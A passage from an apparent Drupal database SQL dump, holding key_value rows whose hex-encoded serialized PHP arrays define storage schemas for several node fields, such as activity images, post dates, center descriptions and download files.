6f74206e756c6c223b623a303b7d733a32363a226669656c645f616374697669746965735f696d675f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a32363a226669656c645f616374697669746965735f696d675f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a32373a226669656c645f616374697669746965735f696d675f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a313a7b693a303b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a33353a226e6f64655f7265766973696f6e5f5f6669656c645f616374697669746965735f696d67223b613a353a7b733a31313a226465736372697074696f6e223b733a36313a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f696d672e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32343a226669656c645f616374697669746965735f696d675f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a32363a226669656c645f616374697669746965735f696d675f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a32363a226669656c645f616374697669746965735f696d675f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a32373a226669656c645f616374697669746965735f696d675f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a313a7b693a303b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_activities_post_date', 0x613a323a7b733a33323a226e6f64655f5f6669656c645f616374697669746965735f706f73745f64617465223b613a343a7b733a31313a226465736372697074696f6e223b733a35353a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f706f73745f646174652e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b613a343a7b733a31313a226465736372697074696f6e223b733a31353a2254686520646174652076616c75652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a32303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b613a313a7b693a303b733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b7d7d7d733a34313a226e6f64655f7265766973696f6e5f5f6669656c645f616374697669746965735f706f73745f64617465223b613a343a7b733a31313a226465736372697074696f6e223b733a36373a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f706f73745f646174652e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b613a343a7b733a31313a226465736372697074696f6e223b733a31353a2254686520646174652076616c75652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a32303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b613a313a7b693a303b733a33323a226669656c645f616374697669746965735f706f73745f646174655f76616c7565223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_announce_post_date', 0x613a323a7b733a33303a226e6f64655f5f6669656c645f616e6e6f756e63655f706f73745f64617465223b613a343a7b733a31313a226465736372697074696f6e223b733a35333a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f616e6e6f756e63655f706f73745f646174652e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b613a343a7b733a31313a226465736372697074696f6e223b733a31353a2254686520646174652076616c75652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a32303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b613a313a7b693a303b733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b7d7d7d733a33393a226e6f64655f7265766973696f6e5f5f6669656c645f616e6e6f756e63655f706f73745f64617465223b613a343a7b733a31313a226465736372697074696f6e223b733a36353a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f616e6e6f756e63655f706f73745f646174652e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b613a343a7b733a31313a226465736372697074696f6e223b733a31353a2254686520646174652076616c75652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a32303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b613a313a7b693a303b733a33303a226669656c645f616e6e6f756e63655f706f73745f646174655f76616c7565223b7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'node.field_schema_data.field_center_description', 0x613a323a7b733a33303a226e6f64655f5f6669656c645f63656e7465725f6465736372697074696f6e223b613a343a7b733a31313a226465736372697074696f6e223b733a35333a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f63656e7465725f6465736372697074696f6e2e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f63656e7465725f6465736372697074696f6e5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a33323a226669656c645f63656e7465725f6465736372697074696f6e5f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b613a313a7b693a303b733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b7d7d7d733a33393a226e6f64655f7265766973696f6e5f5f6669656c645f63656e7465725f6465736372697074696f6e223b613a343a7b733a31313a226465736372697074696f6e223b733a36353a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f63656e7465725f6465736372697074696f6e2e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f63656e7465725f6465736372697074696f6e5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a33323a226669656c645f63656e7465725f6465736372697074696f6e5f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b613a313a7b693a303b733a33313a226669656c645f63656e7465725f6465736372697074696f6e5f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_center_download_file', 0x613a323a7b733a33323a226e6f64655f5f6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a35353a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f63656e7465725f646f776e6c6f61645f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33363a226669656c645f63656e7465725f646f776e6c6f61645f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a33343a226669656c645f63656e7465725f646f776e6c6f61645f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a33383a226669656c645f